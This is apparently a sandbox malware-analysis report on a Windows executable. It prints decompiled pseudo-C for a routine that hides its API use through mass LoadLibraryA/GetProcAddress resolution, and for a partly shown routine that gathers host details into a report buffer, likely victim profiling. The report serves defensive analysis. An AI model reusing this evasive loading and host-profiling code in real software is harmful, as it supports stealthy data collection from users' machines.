Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 992e2f3aa08bb847d4d7b38a0fc008d17796c002ac7ec6c92adbf26547773dbf
Instruction ID: 17b3619be8a6c8d9ef9d3354c516afbcabc49ed57ea4b3ed4b860a08c8dba874
Opcode Fuzzy Hash: 992e2f3aa08bb847d4d7b38a0fc008d17796c002ac7ec6c92adbf26547773dbf
Instruction Fuzzy Hash: 18E0463590010CABCB10DFA4DD41ACAB7F8AB69304F0041BA9486E2140EEB4AAC98F98

Uniqueness

Uniqueness Score: -1.00%

Function 0041A73C Relevance: 227.1, APIs: 151, Instructions: 633
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A73C() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				_Unknown_base(*)()* _t32;

				_t1 =  *0x44752c; // 0x77280000
				if(_t1 != 0) {
					 *0x447518 = GetProcAddress(_t1,  *0x446a34);
					 *0x447598 = GetProcAddress( *0x44752c,  *0x446a40);
					 *0x447500 = GetProcAddress( *0x44752c,  *0x446acc);
					 *0x4473d4 = GetProcAddress( *0x44752c,  *0x447070);
					 *0x4473cc = GetProcAddress( *0x44752c,  *0x4470ec);
					 *0x447478 = GetProcAddress( *0x44752c,  *0x446e4c);
					 *0x447588 = GetProcAddress( *0x44752c,  *0x446abc);
					 *0x4474c4 = GetProcAddress( *0x44752c,  *0x446d38);
					 *0x44753c = GetProcAddress( *0x44752c,  *0x447188);
					 *0x447374 = GetProcAddress( *0x44752c,  *0x4470fc);
					 *0x447550 = GetProcAddress( *0x44752c,  *0x4470d4);
					 *0x44749c = GetProcAddress( *0x44752c,  *0x447268);
					 *0x447378 = GetProcAddress( *0x44752c,  *0x446c88);
					 *0x447474 = GetProcAddress( *0x44752c,  *0x446f6c);
					 *0x4473d8 = GetProcAddress( *0x44752c,  *0x446f08);
					 *0x4473b8 = GetProcAddress( *0x44752c,  *0x446f94);
					 *0x44758c = GetProcAddress( *0x44752c,  *0x446a30);
					 *0x447354 = GetProcAddress( *0x44752c,  *0x44713c);
					 *0x4475a0 = GetProcAddress( *0x44752c,  *0x446f80);
					 *0x4473f8 = GetProcAddress( *0x44752c,  *0x447038);
					 *0x447368 = GetProcAddress( *0x44752c,  *0x446c84);
					 *0x4474a8 = GetProcAddress( *0x44752c,  *0x446f10);
					 *0x447458 = GetProcAddress( *0x44752c,  *0x446de4);
					 *0x44738c = GetProcAddress( *0x44752c,  *0x446af4);
					 *0x447320 = GetProcAddress( *0x44752c,  *0x446bb8);
					 *0x44759c = GetProcAddress( *0x44752c,  *0x446d90);
					 *0x4473ac = GetProcAddress( *0x44752c,  *0x446eac);
					 *0x447454 = GetProcAddress( *0x44752c,  *0x446bdc);
					 *0x4474d0 = GetProcAddress( *0x44752c,  *0x446eec);
					 *0x44732c = GetProcAddress( *0x44752c,  *0x446fc4);
					 *0x447570 = GetProcAddress( *0x44752c,  *0x447248);
					 *0x447590 = GetProcAddress( *0x44752c,  *0x447018);
					 *0x447388 = GetProcAddress( *0x44752c,  *0x446dd0);
					 *0x4473e4 = GetProcAddress( *0x44752c,  *0x446a3c);
					 *0x447358 = GetProcAddress( *0x44752c,  *0x446e44);
					 *0x447390 = GetProcAddress( *0x44752c,  *0x446f5c);
					 *0x447568 = GetProcAddress( *0x44752c,  *0x446b60);
					 *0x447484 = GetProcAddress( *0x44752c,  *0x446ce4);
					 *0x447468 = GetProcAddress( *0x44752c,  *0x446c20);
					 *0x44751c = GetProcAddress( *0x44752c,  *0x4470e8);
					 *0x4473e0 = GetProcAddress( *0x44752c,  *0x447040);
					 *0x447430 = GetProcAddress( *0x44752c,  *0x446b90);
					 *0x447324 = GetProcAddress( *0x44752c,  *0x446ab8);
					 *0x4474f0 = GetProcAddress( *0x44752c,  *0x446a1c);
					 *0x4474dc = GetProcAddress( *0x44752c,  *0x446e70);
					 *0x447498 = GetProcAddress( *0x44752c,  *0x446e68);
					 *0x447574 = GetProcAddress( *0x44752c,  *0x446a20);
					 *0x447364 = GetProcAddress( *0x44752c,  *0x446b20);
					 *0x447470 = GetProcAddress( *0x44752c,  *0x446b7c);
					 *0x4473b0 = GetProcAddress( *0x44752c,  *0x447160);
					 *0x44736c = GetProcAddress( *0x44752c,  *0x4470a8);
					 *0x44754c = GetProcAddress( *0x44752c,  *0x4471c0);
					 *0x447340 = GetProcAddress( *0x44752c,  *0x447288);
					 *0x4474c8 = GetProcAddress( *0x44752c,  *0x446ca4);
					 *0x447524 = GetProcAddress( *0x44752c,  *0x446e34);
					 *0x447394 = GetProcAddress( *0x44752c,  *0x446b24);
					 *0x44746c = GetProcAddress( *0x44752c,  *0x446ba0);
					 *0x4473c4 = GetProcAddress( *0x44752c,  *0x4470dc);
					 *0x447314 = GetProcAddress( *0x44752c,  *0x446e1c);
				}
				_t2 = LoadLibraryA( *0x446d40); // executed
				 *0x4474f4 = _t2; // executed
				_t3 = LoadLibraryA( *0x446bc4); // executed
				 *0x447400 = _t3; // executed
				_t4 = LoadLibraryA( *0x446d08); // executed
				 *0x4473a0 = _t4; // executed
				_t5 = LoadLibraryA( *0x446af8); // executed
				 *0x447448 = _t5; // executed
				_t6 = LoadLibraryA( *0x447168); // executed
				 *0x44743c = _t6;
				 *0x447564 = LoadLibraryA( *0x446a80); // executed
				_t8 = LoadLibraryA( *0x446c3c); // executed
				 *0x447414 = _t8; // executed
				_t9 = LoadLibraryA( *0x446c1c); // executed
				 *0x447558 = _t9;
				 *0x44742c = LoadLibraryA( *0x447044); // executed
				_t11 = LoadLibraryA( *0x446f28); // executed
				 *0x447548 = _t11; // executed
				_t12 = LoadLibraryA( *0x446db8); // executed
				 *0x447404 = _t12;
				_t13 =  *0x4474f4; // 0x73d30000
				if(_t13 != 0) {
					 *0x447424 = GetProcAddress(_t13,  *0x446adc);
					 *0x4474d8 = GetProcAddress( *0x4474f4,  *0x4471bc);
					 *0x4473d0 = GetProcAddress( *0x4474f4,  *0x446f74);
					 *0x4473a8 = GetProcAddress( *0x4474f4,  *0x446d84);
					 *0x447384 = GetProcAddress( *0x4474f4,  *0x446f8c);
					 *0x447528 = GetProcAddress( *0x4474f4,  *0x446a94);
				}
				_t14 =  *0x447400; // 0x779a0000
				if(_t14 != 0) {
					 *0x4473e8 = GetProcAddress(_t14,  *0x446d74);
					 *0x44731c = GetProcAddress( *0x447400,  *0x446b10);
					 *0x4474a0 = GetProcAddress( *0x447400,  *0x446aa0);
				}
				_t15 =  *0x447318; // 0x74790000
				if(_t15 != 0) {
					 *0x447408 = GetProcAddress(_t15,  *0x447150);
					 *0x4473ec = GetProcAddress( *0x447318,  *0x446fa4);
					 *0x447490 = GetProcAddress( *0x447318,  *0x446b80);
					 *0x44756c = GetProcAddress( *0x447318,  *0x4471f4);
					 *0x447328 = GetProcAddress( *0x447318,  *0x446d64);
					 *0x447534 = GetProcAddress( *0x447318,  *0x446c28);
					 *0x4473c8 = GetProcAddress( *0x447318,  *0x447054);
					 *0x44740c = GetProcAddress( *0x447318,  *0x447024);
					 *0x447330 = GetProcAddress( *0x447318,  *0x4471c8);
					 *0x447580 = GetProcAddress( *0x447318,  *0x447284);
					 *0x447530 = GetProcAddress( *0x447318,  *0x446fb4);
					 *0x4473f0 = GetProcAddress( *0x447318,  *0x44709c);
					 *0x44745c = GetProcAddress( *0x447318,  *0x446de0);
					 *0x447508 = GetProcAddress( *0x447318,  *0x446c04);
					 *0x447380 = GetProcAddress( *0x447318,  *0x447190);
				}
				_t16 =  *0x4473a0; // 0x70060000
				if(_t16 != 0) {
					 *0x447418 = GetProcAddress(_t16,  *0x446c6c);
					 *0x447440 = GetProcAddress( *0x4473a0,  *0x446fe8);
					 *0x4474fc = GetProcAddress( *0x4473a0,  *0x446fd4);
					 *0x44757c = GetProcAddress( *0x4473a0,  *0x446f98);
					 *0x447538 = GetProcAddress( *0x4473a0,  *0x446c7c);
					 *0x44741c = GetProcAddress( *0x4473a0,  *0x446ee4);
					 *0x44734c = GetProcAddress( *0x4473a0,  *0x4471a8);
					 *0x447594 = GetProcAddress( *0x4473a0,  *0x446e10);
					 *0x447460 = GetProcAddress( *0x4473a0,  *0x447238);
					 *0x447420 = GetProcAddress( *0x4473a0,  *0x446c98);
					 *0x447310 = GetProcAddress( *0x4473a0,  *0x446eb4);
					 *0x4473fc = GetProcAddress( *0x4473a0,  *0x447218);
					 *0x4473bc = GetProcAddress( *0x4473a0,  *0x4471a4);
				}
				_t17 =  *0x447448; // 0x76080000
				if(_t17 != 0) {
					 *0x44737c = GetProcAddress(_t17,  *0x446c94);
					 *0x44735c = GetProcAddress( *0x447448,  *0x4470b0);
					 *0x44733c = GetProcAddress( *0x447448,  *0x446ce0);
					 *0x4474f8 = GetProcAddress( *0x447448,  *0x447074);
					 *0x447494 = GetProcAddress( *0x447448,  *0x446f18);
					 *0x447428 = GetProcAddress( *0x447448,  *0x446bac);
					 *0x447410 = GetProcAddress( *0x447448,  *0x447250);
				}
				_t18 =  *0x44743c; // 0x74a80000
				if(_t18 != 0) {
					 *0x447398 = GetProcAddress(_t18,  *0x446f20);
					 *0x4474e8 = GetProcAddress( *0x44743c,  *0x446d34);
					 *0x447504 = GetProcAddress( *0x44743c,  *0x447214);
					 *0x44744c = GetProcAddress( *0x44743c,  *0x446b68);
					 *0x447348 = GetProcAddress( *0x44743c,  *0x446e18);
				}
				_t19 =  *0x447564; // 0x76ee0000
				if(_t19 != 0) {
					 *0x447338 = GetProcAddress(_t19,  *0x4470a0);
					 *0x4474e4 = GetProcAddress( *0x447564,  *0x446e38);
					 *0x4474b0 = GetProcAddress( *0x447564,  *0x44708c);
					 *0x447344 = GetProcAddress( *0x447564,  *0x4470e0);
					 *0x447560 = GetProcAddress( *0x447564,  *0x4470d8);
					 *0x447334 = GetProcAddress( *0x447564,  *0x446d30);
					 *0x4474bc = GetProcAddress( *0x447564,  *0x446f88);
					 *0x447578 = GetProcAddress( *0x447564,  *0x446cb4);
					 *0x447584 = GetProcAddress( *0x447564,  *0x446da8);
					 *0x447520 = GetProcAddress( *0x447564,  *0x446f48);
					 *0x447554 = GetProcAddress( *0x447564,  *0x446db4);
				}
				_t20 =  *0x447414; // 0x77180000
				if(_t20 != 0) {
					 *0x44750c = GetProcAddress(_t20,  *0x446dd8);
					 *0x447370 = GetProcAddress( *0x447414,  *0x446fe4);
					 *0x447464 = GetProcAddress( *0x447414,  *0x4470c0);
				}
				_t21 =  *0x447558; // 0x74c60000
				if(_t21 != 0) {
					 *0x447544 = GetProcAddress(_t21,  *0x446d9c);
					 *0x447438 = GetProcAddress( *0x447558,  *0x446a84);
					 *0x4474c0 = GetProcAddress( *0x447558,  *0x446c8c);
				}
				_t22 =  *0x44742c; // 0x77230000
				if(_t22 != 0) {
					 *0x4475a4 = GetProcAddress(_t22,  *0x446d78);
					 *0x4473dc = GetProcAddress( *0x44742c,  *0x446ac4);
					 *0x447510 = GetProcAddress( *0x44742c,  *0x446b78);
					 *0x4474a4 = GetProcAddress( *0x44742c,  *0x446c70);
					 *0x447360 = GetProcAddress( *0x44742c,  *0x44712c);
					 *0x44739c = GetProcAddress( *0x44742c,  *0x447014);
				}
				_t23 =  *0x447548; // 0x6db60000
				if(_t23 != 0) {
					 *0x447450 = GetProcAddress(_t23,  *0x446e9c);
				}
				_t24 =  *0x447404; // 0x73a30000
				if(_t24 != 0) {
					 *0x4473a4 = GetProcAddress(_t24,  *0x446e00);
					 *0x4473f4 = GetProcAddress( *0x447404,  *0x446cb8);
					 *0x4474ac = GetProcAddress( *0x447404,  *0x446d20);
					 *0x4474ec = GetProcAddress( *0x447404,  *0x446b38);
					 *0x4474cc = GetProcAddress( *0x447404,  *0x446f50);
					 *0x447480 = GetProcAddress( *0x447404,  *0x447270);
					 *0x4473c0 = GetProcAddress( *0x447404,  *0x446da4);
					_t32 = GetProcAddress( *0x447404,  *0x447264);
					 *0x447540 = _t32;
					return _t32;
				}
				return _t24;
			}

0x0041a73c
0x0041a743
0x0041a75c
0x0041a773
0x0041a78a
0x0041a7a1
0x0041a7b8
0x0041a7cf
0x0041a7e6
0x0041a7fd
0x0041a814
0x0041a82b
0x0041a842
0x0041a859
0x0041a870
0x0041a887
0x0041a89e
0x0041a8b5
0x0041a8cc
0x0041a8e3
0x0041a8fa
0x0041a911
0x0041a928
0x0041a93f
0x0041a956
0x0041a96d
0x0041a984
0x0041a99b
0x0041a9b2
0x0041a9c9
0x0041a9e0
0x0041a9f7
0x0041aa0e
0x0041aa25
0x0041aa3c
0x0041aa53
0x0041aa6a
0x0041aa81
0x0041aa98
0x0041aaaf
0x0041aac6
0x0041aadd
0x0041aaf4
0x0041ab0b
0x0041ab22
0x0041ab39
0x0041ab50
0x0041ab67
0x0041ab7e
0x0041ab95
0x0041abac
0x0041abc3
0x0041abda
0x0041abf1
0x0041ac08
0x0041ac1f
0x0041ac36
0x0041ac4d
0x0041ac64
0x0041ac7b
0x0041ac8c
0x0041ac8c
0x0041ac97
0x0041aca3
0x0041aca8
0x0041acb4
0x0041acb9
0x0041acc5
0x0041acca
0x0041acd6
0x0041acdb
0x0041ace7
0x0041acf8
0x0041acfd
0x0041ad09
0x0041ad0e
0x0041ad1a
0x0041ad2b
0x0041ad30
0x0041ad3c
0x0041ad41
0x0041ad47
0x0041ad4c
0x0041ad53
0x0041ad6c
0x0041ad83
0x0041ad9a
0x0041adb1
0x0041adc8
0x0041add9
0x0041add9
0x0041adde
0x0041ade5
0x0041adfa
0x0041ae11
0x0041ae22
0x0041ae22
0x0041ae27
0x0041ae2e
0x0041ae47
0x0041ae5e
0x0041ae75
0x0041ae8c
0x0041aea3
0x0041aeba
0x0041aed1
0x0041aee8
0x0041aeff
0x0041af16
0x0041af2d
0x0041af44
0x0041af5b
0x0041af72
0x0041af83
0x0041af83
0x0041af88
0x0041af8f
0x0041afa8
0x0041afbf
0x0041afd6
0x0041afed
0x0041b004
0x0041b01b
0x0041b032
0x0041b049
0x0041b060
0x0041b077
0x0041b08e
0x0041b0a5
0x0041b0b6
0x0041b0b6
0x0041b0bb
0x0041b0c2
0x0041b0db
0x0041b0f2
0x0041b109
0x0041b120
0x0041b137
0x0041b14e
0x0041b15f
0x0041b15f
0x0041b164
0x0041b16b
0x0041b180
0x0041b197
0x0041b1ae
0x0041b1c5
0x0041b1d6
0x0041b1d6
0x0041b1db
0x0041b1e2
0x0041b1fb
0x0041b212
0x0041b229
0x0041b240
0x0041b257
0x0041b26e
0x0041b285
0x0041b29c
0x0041b2b3
0x0041b2ca
0x0041b2db
0x0041b2db
0x0041b2e0
0x0041b2e7
0x0041b2fc
0x0041b313
0x0041b324
0x0041b324
0x0041b329
0x0041b330
0x0041b345
0x0041b35c
0x0041b36d
0x0041b36d
0x0041b372
0x0041b379
0x0041b392
0x0041b3a9
0x0041b3c0
0x0041b3d7
0x0041b3ee
0x0041b3ff
0x0041b3ff
0x0041b404
0x0041b40b
0x0041b41a
0x0041b41a
0x0041b41f
0x0041b426
0x0041b43f
0x0041b456
0x0041b46d
0x0041b484
0x0041b49b
0x0041b4b2
0x0041b4c9
0x0041b4d4
0x0041b4da
0x00000000
0x0041b4da
0x0041b4df

APIs

GetProcAddress.KERNEL32(77280000,0040C6A4), ref: 0041A750
GetProcAddress.KERNEL32 ref: 0041A767
GetProcAddress.KERNEL32 ref: 0041A77E
GetProcAddress.KERNEL32 ref: 0041A795
GetProcAddress.KERNEL32 ref: 0041A7AC
GetProcAddress.KERNEL32 ref: 0041A7C3
GetProcAddress.KERNEL32 ref: 0041A7DA
GetProcAddress.KERNEL32 ref: 0041A7F1
GetProcAddress.KERNEL32 ref: 0041A808
GetProcAddress.KERNEL32 ref: 0041A81F
GetProcAddress.KERNEL32 ref: 0041A836
GetProcAddress.KERNEL32 ref: 0041A84D
GetProcAddress.KERNEL32 ref: 0041A864
GetProcAddress.KERNEL32 ref: 0041A87B
GetProcAddress.KERNEL32 ref: 0041A892
GetProcAddress.KERNEL32 ref: 0041A8A9
GetProcAddress.KERNEL32 ref: 0041A8C0
GetProcAddress.KERNEL32 ref: 0041A8D7
GetProcAddress.KERNEL32 ref: 0041A8EE
GetProcAddress.KERNEL32 ref: 0041A905
GetProcAddress.KERNEL32 ref: 0041A91C
GetProcAddress.KERNEL32 ref: 0041A933
GetProcAddress.KERNEL32 ref: 0041A94A
GetProcAddress.KERNEL32 ref: 0041A961
GetProcAddress.KERNEL32 ref: 0041A978
GetProcAddress.KERNEL32 ref: 0041A98F
GetProcAddress.KERNEL32 ref: 0041A9A6
GetProcAddress.KERNEL32 ref: 0041A9BD
GetProcAddress.KERNEL32 ref: 0041A9D4
GetProcAddress.KERNEL32 ref: 0041A9EB
GetProcAddress.KERNEL32 ref: 0041AA02
GetProcAddress.KERNEL32 ref: 0041AA19
GetProcAddress.KERNEL32 ref: 0041AA30
GetProcAddress.KERNEL32 ref: 0041AA47
GetProcAddress.KERNEL32 ref: 0041AA5E
GetProcAddress.KERNEL32 ref: 0041AA75
GetProcAddress.KERNEL32 ref: 0041AA8C
GetProcAddress.KERNEL32 ref: 0041AAA3
GetProcAddress.KERNEL32 ref: 0041AABA
GetProcAddress.KERNEL32 ref: 0041AAD1
GetProcAddress.KERNEL32 ref: 0041AAE8
GetProcAddress.KERNEL32 ref: 0041AAFF
GetProcAddress.KERNEL32 ref: 0041AB16
GetProcAddress.KERNEL32 ref: 0041AB2D
GetProcAddress.KERNEL32 ref: 0041AB44
GetProcAddress.KERNEL32 ref: 0041AB5B
GetProcAddress.KERNEL32 ref: 0041AB72
GetProcAddress.KERNEL32 ref: 0041AB89
GetProcAddress.KERNEL32 ref: 0041ABA0
GetProcAddress.KERNEL32 ref: 0041ABB7
GetProcAddress.KERNEL32 ref: 0041ABCE
GetProcAddress.KERNEL32 ref: 0041ABE5
GetProcAddress.KERNEL32 ref: 0041ABFC
GetProcAddress.KERNEL32 ref: 0041AC13
GetProcAddress.KERNEL32 ref: 0041AC2A
GetProcAddress.KERNEL32 ref: 0041AC41
GetProcAddress.KERNEL32 ref: 0041AC58
GetProcAddress.KERNEL32 ref: 0041AC6F
GetProcAddress.KERNEL32 ref: 0041AC86
LoadLibraryA.KERNEL32(0040C6A4), ref: 0041AC97
LoadLibraryA.KERNEL32 ref: 0041ACA8
LoadLibraryA.KERNEL32 ref: 0041ACB9
LoadLibraryA.KERNEL32 ref: 0041ACCA
LoadLibraryA.KERNEL32 ref: 0041ACDB
LoadLibraryA.KERNEL32 ref: 0041ACEC
LoadLibraryA.KERNEL32 ref: 0041ACFD
LoadLibraryA.KERNEL32 ref: 0041AD0E
LoadLibraryA.KERNEL32 ref: 0041AD1F
LoadLibraryA.KERNEL32 ref: 0041AD30
LoadLibraryA.KERNEL32 ref: 0041AD41
GetProcAddress.KERNEL32(73D30000), ref: 0041AD60
GetProcAddress.KERNEL32 ref: 0041AD77
GetProcAddress.KERNEL32 ref: 0041AD8E
GetProcAddress.KERNEL32 ref: 0041ADA5
GetProcAddress.KERNEL32 ref: 0041ADBC
GetProcAddress.KERNEL32 ref: 0041ADD3
GetProcAddress.KERNEL32(779A0000), ref: 0041ADEE
GetProcAddress.KERNEL32 ref: 0041AE05
GetProcAddress.KERNEL32 ref: 0041AE1C
GetProcAddress.KERNEL32(74790000), ref: 0041AE3B
GetProcAddress.KERNEL32 ref: 0041AE52
GetProcAddress.KERNEL32 ref: 0041AE69
GetProcAddress.KERNEL32 ref: 0041AE80
GetProcAddress.KERNEL32 ref: 0041AE97
GetProcAddress.KERNEL32 ref: 0041AEAE
GetProcAddress.KERNEL32 ref: 0041AEC5
GetProcAddress.KERNEL32 ref: 0041AEDC
GetProcAddress.KERNEL32 ref: 0041AEF3
GetProcAddress.KERNEL32 ref: 0041AF0A
GetProcAddress.KERNEL32 ref: 0041AF21
GetProcAddress.KERNEL32 ref: 0041AF38
GetProcAddress.KERNEL32 ref: 0041AF4F
GetProcAddress.KERNEL32 ref: 0041AF66
GetProcAddress.KERNEL32 ref: 0041AF7D
GetProcAddress.KERNEL32(70060000), ref: 0041AF9C
GetProcAddress.KERNEL32 ref: 0041AFB3
GetProcAddress.KERNEL32 ref: 0041AFCA
GetProcAddress.KERNEL32 ref: 0041AFE1
GetProcAddress.KERNEL32 ref: 0041AFF8
GetProcAddress.KERNEL32 ref: 0041B00F
GetProcAddress.KERNEL32 ref: 0041B026
GetProcAddress.KERNEL32 ref: 0041B03D
GetProcAddress.KERNEL32 ref: 0041B054
GetProcAddress.KERNEL32 ref: 0041B06B
GetProcAddress.KERNEL32 ref: 0041B082
GetProcAddress.KERNEL32 ref: 0041B099
GetProcAddress.KERNEL32 ref: 0041B0B0
GetProcAddress.KERNEL32(76080000), ref: 0041B0CF
GetProcAddress.KERNEL32 ref: 0041B0E6
GetProcAddress.KERNEL32 ref: 0041B0FD
GetProcAddress.KERNEL32 ref: 0041B114
GetProcAddress.KERNEL32 ref: 0041B12B
GetProcAddress.KERNEL32 ref: 0041B142
GetProcAddress.KERNEL32 ref: 0041B159
GetProcAddress.KERNEL32(74A80000), ref: 0041B174
GetProcAddress.KERNEL32 ref: 0041B18B
GetProcAddress.KERNEL32 ref: 0041B1A2
GetProcAddress.KERNEL32 ref: 0041B1B9
GetProcAddress.KERNEL32 ref: 0041B1D0
GetProcAddress.KERNEL32(76EE0000), ref: 0041B1EF
GetProcAddress.KERNEL32 ref: 0041B206
GetProcAddress.KERNEL32 ref: 0041B21D
GetProcAddress.KERNEL32 ref: 0041B234
GetProcAddress.KERNEL32 ref: 0041B24B
GetProcAddress.KERNEL32 ref: 0041B262
GetProcAddress.KERNEL32 ref: 0041B279
GetProcAddress.KERNEL32 ref: 0041B290
GetProcAddress.KERNEL32 ref: 0041B2A7
GetProcAddress.KERNEL32 ref: 0041B2BE
GetProcAddress.KERNEL32 ref: 0041B2D5
GetProcAddress.KERNEL32(77180000), ref: 0041B2F0
GetProcAddress.KERNEL32 ref: 0041B307
GetProcAddress.KERNEL32 ref: 0041B31E
GetProcAddress.KERNEL32(74C60000), ref: 0041B339
GetProcAddress.KERNEL32 ref: 0041B350
GetProcAddress.KERNEL32 ref: 0041B367
GetProcAddress.KERNEL32(77230000), ref: 0041B386
GetProcAddress.KERNEL32 ref: 0041B39D
GetProcAddress.KERNEL32 ref: 0041B3B4
GetProcAddress.KERNEL32 ref: 0041B3CB
GetProcAddress.KERNEL32 ref: 0041B3E2
GetProcAddress.KERNEL32 ref: 0041B3F9
GetProcAddress.KERNEL32(6DB60000), ref: 0041B414
GetProcAddress.KERNEL32(73A30000), ref: 0041B433
GetProcAddress.KERNEL32 ref: 0041B44A
GetProcAddress.KERNEL32 ref: 0041B461
GetProcAddress.KERNEL32 ref: 0041B478
GetProcAddress.KERNEL32 ref: 0041B48F
GetProcAddress.KERNEL32 ref: 0041B4A6
GetProcAddress.KERNEL32 ref: 0041B4BD
GetProcAddress.KERNEL32 ref: 0041B4D4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: d2d561f1e6329d89a7a32deac19f009dd110a6e10656d386b6a2a0e588109ba4
Instruction ID: e4260eba790a0964194c9b1260355292b0439814283cc14f05208e59b4cd72f0
Opcode Fuzzy Hash: d2d561f1e6329d89a7a32deac19f009dd110a6e10656d386b6a2a0e588109ba4
Instruction Fuzzy Hash: B872D77D50A200AFDB026FA4FE488747FBAF70B35135144B5EA0585632DB32486AEF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBA9 Relevance: 105.4, APIs: 70, Instructions: 444
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E0040BBA9(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v100020;
				char _v100048;
				struct _DISPLAY_DEVICEA _v100476;
				intOrPtr _v100480;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed int _t132;
				intOrPtr _t134;
				intOrPtr* _t140;
				intOrPtr* _t155;
				intOrPtr* _t163;
				intOrPtr* _t171;
				long _t179;
				intOrPtr* _t180;
				void* _t192;
				void* _t211;
				intOrPtr* _t218;
				intOrPtr* _t226;
				void* _t234;
				intOrPtr* _t248;
				void* _t260;
				intOrPtr* _t267;
				void* _t275;
				void* _t307;
				void* _t309;
				void* _t315;
				void* _t316;
				void* _t334;
				void* _t335;
				char* _t336;
				char* _t338;
				void* _t339;
				void* _t340;
				CHAR* _t346;
				void* _t347;
				signed int _t348;
				void* _t364;

				_t364 = __fp0;
				_t334 = __edx;
				_t316 = __ecx;
				E0042E350(0x18874);
				_t131 =  *0x444664; // 0xfa3a0753
				_t132 = _t131 ^ _t348;
				_v20 = _t132;
				 *[fs:0x0] =  &_v16;
				_t134 =  *0x4472ac; // 0x0
				_v100480 = _t134;
				E0041F6B0( &_v100020, 0, 0x186a0);
				 *0x4474e0( &_v100020,  *0x446a38, _t132, _t335, _t340, _t309,  *[fs:0x0], E004341E4, 0xffffffff);
				_t140 = E00408A7F(_t316,  &_v100048);
				_v8 = 0;
				if( *((intOrPtr*)(_t140 + 0x14)) >= 0x10) {
					_t140 =  *_t140;
				}
				 *0x4474e0( &_v100020, _t140);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, "\n\n");
				 *0x4474e0( &_v100020,  *0x4470cc);
				 *0x4474e0( &_v100020, E004169DC());
				_t336 = "\n";
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446cac);
				_t155 = E00417207(_t334, _t336,  &_v100048); // executed
				_v8 = 1;
				if( *((intOrPtr*)(_t155 + 0x14)) >= 0x10) {
					_t155 =  *_t155;
				}
				 *0x4474e0( &_v100020, _t155);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x44707c);
				_t343 =  &_v100048;
				_t163 = E004171BF(1, _t334, _t336,  &_v100048); // executed
				_v8 = 2;
				_t356 =  *((intOrPtr*)(_t163 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t163 + 0x14)) >= 0x10) {
					_t163 =  *_t163;
				}
				 *0x4474e0( &_v100020, _t163);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x447114);
				_t171 = E00416A49(1,  &_v100048, _t336, _t343, _t356); // executed
				_v8 = 3;
				if( *((intOrPtr*)(_t171 + 0x14)) >= 0x10) {
					_t171 =  *_t171;
				}
				 *0x4474e0( &_v100020, _t171);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, "\n\n");
				 *0x4474e0( &_v100020,  *0x447210);
				_t179 = GetCurrentProcessId();
				_t312 =  &_v100048;
				_t180 = E00417EF5( &_v100048, _t334, _t336, _t179); // executed
				_v8 = 4;
				_t358 =  *((intOrPtr*)(_t180 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t180 + 0x14)) >= 0x10) {
					_t180 =  *_t180;
				}
				 *0x4474e0( &_v100020, _t180);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446bf4);
				 *0x4474e0( &_v100020, "\n\n");
				 *0x4474e0( &_v100020,  *0x446d1c); // executed
				_t192 = E0041709D(_t336, 0); // executed
				 *0x4474e0( &_v100020, _t192);
				 *0x4474e0( &_v100020, " [");
				 *0x4474e0( &_v100020, E0041714D( &_v100048));
				 *0x4474e0( &_v100020, "]\n");
				 *0x4474e0( &_v100020,  *0x447090);
				 *0x4474e0( &_v100020, E0041704D(_t312, _t334, _t336, 0));
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446b9c); // executed
				_t211 = E0041717C(); // executed
				 *0x4474e0( &_v100020, _t211);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x44705c);
				_t218 = E004172C7(_t312,  &_v100048, _t334, _t336, 0, _t358);
				_v8 = 5;
				_t359 =  *((intOrPtr*)(_t218 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t218 + 0x14)) >= 0x10) {
					_t218 =  *_t218;
				}
				 *0x4474e0( &_v100020, _t218);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v100048, 1, 0);
				 *0x4474e0( &_v100020, _t336);
				 *0x4474e0( &_v100020,  *0x446e24);
				_t313 =  &_v100048;
